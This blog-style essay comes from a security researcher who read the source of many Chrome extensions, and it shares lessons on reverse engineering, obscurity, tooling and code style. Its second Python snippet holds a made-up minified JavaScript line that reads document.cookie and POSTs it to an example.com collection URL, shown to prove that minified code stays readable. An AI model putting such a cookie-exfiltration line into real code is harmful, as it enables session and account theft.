Lessons I learned from reading thousands of lines of code

Over the past two months, my main job has been to read codebases. Literally, just reading code. I wrote a post a few weeks ago in which I described how I downloaded 450 GB of Chrome plugins.

Here’s a bit of background first. I work(ed), part-time, as a security researcher at the intersection of machine learning and whatever security issues can arise from it. The goal was to discover whether client-side machine learning deployed at scale could be vulnerable to security flaws. Imagine your ad blocker plugin taking a snapshot of your webpage to do machine learning, but ending up doing something shady instead. Google Chrome extensions made a good list of potential candidates.

When it came to analyzing Chrome extensions, there was no tool that I could use. Any tooling I needed, I would have to invent myself. But before I could even think of building a ‘meta-analyzer’ that could tell me whether an extension was doing something shady just by being fed its source code, I was better off diving deep into those extensions manually. And that is exactly what I did. I built some ‘helper’ snippets to ease my job, but the majority of the time I just read piles of JavaScript: ugly and beautiful, simple and arcane.
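For illustration, a helper of this kind might look like the Python sketch below. It is not one of the original snippets. The function name `flag_source` and the indicator list are assumptions made up for this example; the only real API it refers to is `chrome.tabs.captureVisibleTab`, which extensions can use to take a screenshot of the visible tab.

```python
import re

# Hypothetical indicator list, chosen for illustration only.
INDICATORS = {
    "screenshot": re.compile(r"captureVisibleTab"),
    "ml_library": re.compile(r"tensorflow|tfjs|onnx", re.IGNORECASE),
    "network": re.compile(r"XMLHttpRequest|fetch\("),
}


def flag_source(source):
    """Count how often each indicator pattern appears in a JavaScript source string."""
    return {name: len(pattern.findall(source)) for name, pattern in INDICATORS.items()}


# A made-up one-line extension snippet, not taken from any real extension.
sample = 'chrome.tabs.captureVisibleTab(null,{},function(u){fetch("https://example.com",{body:u})})'
print(flag_source(sample))
```

A count like this only tells you where to start reading. It says nothing about what the code actually does with the screenshot or the request.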

I have written thousands of lines of code as a programmer, but solely reading code to understand and ‘reverse-engineer’ thousands of lines of it (often obfuscated) taught me a few great lessons.

1. You can’t reverse engineer a system without fully understanding it

Or conversely, if you understand a system well enough, you can easily reverse-engineer it. If you fancy another version: the more you understand a system, the better your odds of reverse-engineering it.

For instance, after I had figured out the major machinery of about five extensions (some of which had a whopping 20k+ lines of code), the next ones almost spoke to me directly. Once I had understood most of the structure of some of the suspected extensions, a little peek into the next ones gave it all away. I should mention that it was not only the depth but also the breadth of my exploration that helped me get a very good grasp of the ‘things that mattered’.

At some point, it became ‘obvious’ to me exactly where I should be looking. I think you can get better at hacking a system if you expose yourself to it enough.

2. Surely, you are hiding something, Mr. Programmer!

There is a naive approach to security called security through obscurity. I used to believe that if you write fairly obscure code, it might be difficult to uncover its logic. I was wrong, and I figured that out myself: after going through the source code of only a few plugins, I realized that even minified code was decently obvious to me.

You think you can easily hide things, and you live under a rock, believing that no one will ever figure things out. But alas, someone, somewhere has figured something out about you.
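One reason minified code stays readable is that minifiers shorten local names but cannot rename string literals or the members of built-in objects. The Python sketch below shows this on a made-up minified snippet (an assumption for illustration, not code from any real extension): the one-letter variable names hide nothing about where the data comes from or where it goes.

```python
import re

# A made-up minified snippet: local names are shortened,
# but string literals and built-in API names are left intact.
minified = (
    'function a(b){var c=document.cookie;var d=new XMLHttpRequest;'
    'd.open("POST","https://example.com/collect");d.send(c)}'
)

# String literals survive minification untouched.
strings = re.findall(r'"([^"]*)"', minified)

# Blank out the string contents so dots inside URLs are not mistaken for member access.
code_only = re.sub(r'"[^"]*"', '""', minified)

# Property and method names on built-in objects survive as well.
members = re.findall(r"\.([A-Za-z_]\w+)", code_only)

print(strings)
print(members)
```

Reading just those two lists already suggests what the snippet does: it reads the cookie and sends it to a remote URL.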

3. No tool at all is better than an un-understood tool

With a plethora of tools available for almost every problem, it is a common temptation to go for specialized ones. But if the problem you are dealing with is so novel that you have not even comprehended it yet, it might be better not to use a tool at all. If you still have not figured out the basics of JavaScript, for example, picking up jQuery to learn JavaScript might not be a good idea.

Sometimes, not having a tool is actually better. When you have to invent or even reinvent the tool, you end up fully understanding and appreciating it.

4. The human brain is extremely code-plastic in nature

If you are a programmer who once in a while encounters other programmers, then you must have met those pesky snobs who preach a certain coding style, or those who go for stringent linting. Shamelessly, I am one of the former. But when you read a codebase that is used by hundreds of thousands of people (think of a famous Chrome extension), and it is a complete mess, and yet it works, you tend to soften a bit. It is almost magical, but in less than a few days, I realized that I could look at very ugly code and still admire its inner workings, its utility, its users' comments and feedback. ES5 vs ES6, tabs vs spaces, light vs node-bloated constipation: almost everything was acceptable.

And therein I learned my lesson: if I feed my brain good style, good guidelines, and good practices, it will soon catch up. Of course, the converse should apply as well.